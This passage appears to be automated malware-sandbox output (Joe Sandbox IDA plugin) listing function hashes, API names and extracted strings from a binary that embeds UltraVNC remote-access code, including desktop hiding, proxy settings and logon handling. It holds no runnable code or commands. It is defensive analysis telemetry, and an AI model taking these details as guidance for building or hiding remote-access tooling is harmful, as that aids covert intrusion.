                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                            • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                            • API String ID: 333848887-3586523739
                                                                            • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                            • Instruction ID: ba9ca640f3d9436bf1c9530caeeaa7dd71db16d154abf3efbf397b309182c087
                                                                            • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                            • Instruction Fuzzy Hash: 02411724919B8281F750AF21E85427532B0BF997AEF444135CEDEC6BA0DFBCE065CB44
                                                                            APIs
                                                                            Strings
                                                                            • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF6C2BB0AAC
                                                                            • x, xrefs: 00007FF6C2BB0A25
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                            • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                            • API String ID: 3190128964-2508378015
                                                                            • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                            • Instruction ID: 18c5701869b1bb5cd949c179ff06b73f05e39b1ba915b914fa1d47c2272bfa9b
                                                                            • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                            • Instruction Fuzzy Hash: 73310C36608A8696E750DF69E8445AA7371FB89B9EF044032EF8E87718DFBCD445CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CombineCreateDeleteObjectRectfree$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID: vistahook.cpp : REct %i %i %i %i
                                                                            • API String ID: 1305454473-3781348997
                                                                            • Opcode ID: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                            • Instruction ID: dbb38ae4d9b27e0203aa2a95a07324275bbd8ad4bea865372872e3f0dd484c43
                                                                            • Opcode Fuzzy Hash: d0ac63cbbbf134ee707a0d0b838e12a005fdeef02525ce0b9f81c8b524f91dbc
                                                                            • Instruction Fuzzy Hash: EFE15476B08A918EE750CF69D4846AC77F1FB49B88F404026DE8E93B18DFB9E454CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                            • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                            • API String ID: 1123868200-453874877
                                                                            • Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                            • Instruction ID: dae916a37b70fb4340c0ac184c4aefcb1f7325133404e62dc6723b62738977e3
                                                                            • Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                            • Instruction Fuzzy Hash: 85516D22A0968385EE619F25D4502B967A0FF96B8EF080536DF8DC7795EFBCE445C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                            • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 1907048692-1814171851
                                                                            • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                            • Instruction ID: c387c03e26593ed70dd2f443bea05b99e9bf61b1f15af7d7bb2defc6ff527969
                                                                            • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                            • Instruction Fuzzy Hash: 78312C25A08A8281FB90DF61A8446B963B1FF9974EF844136DECEC7754DFBCE1158740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 1881577244-0
                                                                            • Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                            • Instruction ID: e65fd1ad79f02b088b6e176cb734cd68a2ee3c4639dfee69a55570153e73a66c
                                                                            • Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                            • Instruction Fuzzy Hash: E7A1F172A086864AEB50CF16E584BAA7765FB85B8EF105134DE8ED3B54DFB8E404C701
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                            • String ID:
                                                                            • API String ID: 2677898628-0
                                                                            • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                            • Instruction ID: 78fe34d6a52c916c87afa0ff0698f9273fb652f50ea1ab9224e7ed985f563bb9
                                                                            • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                            • Instruction Fuzzy Hash: F1415372B14A2289EB50DFA2EC909AD3330BB85B8EB404132DF5E93B68CF68D445C340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                                            • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1769082246-4238595597
                                                                            • Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                            • Instruction ID: 81223898dff07f9e430692724ffd4a5a9b016ee549f62a99b13fd1a26d56ceac
                                                                            • Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                            • Instruction Fuzzy Hash: 72E17B32A0869185E794CF29C458BEE7BB1EB86B8DF154032DE8D877A1CFB9E441C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$Leave
                                                                            • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2801635615-1537001432
                                                                            • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                            • Instruction ID: 9849619ae6a04d670baf48b247e7190d0b4e9b3c44a141c3344e8e63b6049851
                                                                            • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                            • Instruction Fuzzy Hash: D0D17022A0869185EB90DF25C458BBE7BB0EB86B8EF194131CE8D877A1CFB9D445C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                            • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                            • API String ID: 1719662965-904825817
                                                                            • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                            • Instruction ID: acb9604c1827d5d51e8d44131fef234b5c86c7c42faa081e643b7f7554e92930
                                                                            • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                            • Instruction Fuzzy Hash: 01415F35A08A8281FA609F25A8456F923A0FF89B9EF444532DEDDC77A5DEBCE145C700
                                                                            APIs
                                                                            Strings
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8ABD4
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AC17
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6C2B8AC72
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6C2B8AC8A
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8ABB9
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastParametersSystem
                                                                            • String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
                                                                            • API String ID: 2777246624-426764769
                                                                            • Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                            • Instruction ID: 29455c2af8b8327bdec4c45de4838e12529921b6310baf4bd3c61abd7b9307fc
                                                                            • Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                            • Instruction Fuzzy Hash: 5F311D64E1868396F7A09F61A844BB527A0BF5574EF848032CECDD37A0DEBCB449C740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                            • String ID:
                                                                            • API String ID: 4219907860-0
                                                                            • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                            • Instruction ID: 13d10854f88b9f839847483b1ff35d31f5fa767cc186b162568a85ee7f563850
                                                                            • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                            • Instruction Fuzzy Hash: 4341742261869286EB60DF25A8446AA73A0FB89BDDF005436EF8E87B54DFBCD104D750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$Free$AddressLoadProc
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                            • API String ID: 1386263645-671781545
                                                                            • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                            • Instruction ID: 9a6665748258587bc6ef7c84e872a104f99f84210ef31b5e8d496816a93600c7
                                                                            • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                            • Instruction Fuzzy Hash: 3841493191860286EB688F28E89533836A0EB46B9FF504531CE9DCA3D4DFFDE4459701
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
• String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
• API String ID: 3057866299-2798169553
• Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
• Instruction ID: 998f4267bc7b6790459471968162d55e35bc428006070e9cdf99b4ffdc13ee6c
• Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
• Instruction Fuzzy Hash: F331C721A1A64391ED95DF25E4911B862A0EF6574EF8C4836DF8DC67A1FFACE894C300
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
Yara matches
Similarity
• API ID: Close$CreateOpenQueryValueVersion
• String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
• API String ID: 1076069355-3579764778
• Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
• Instruction ID: db925aba81390d1a3c7bc51fa27e9c9b7c65110d8eb08dfe29f1b81f25fb9e5c
• Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
• Instruction Fuzzy Hash: 95311272908B8286EBA09F10F4553AAB3B0FB88759F800135EBCD82B54DFBCD159CB40
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
• Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
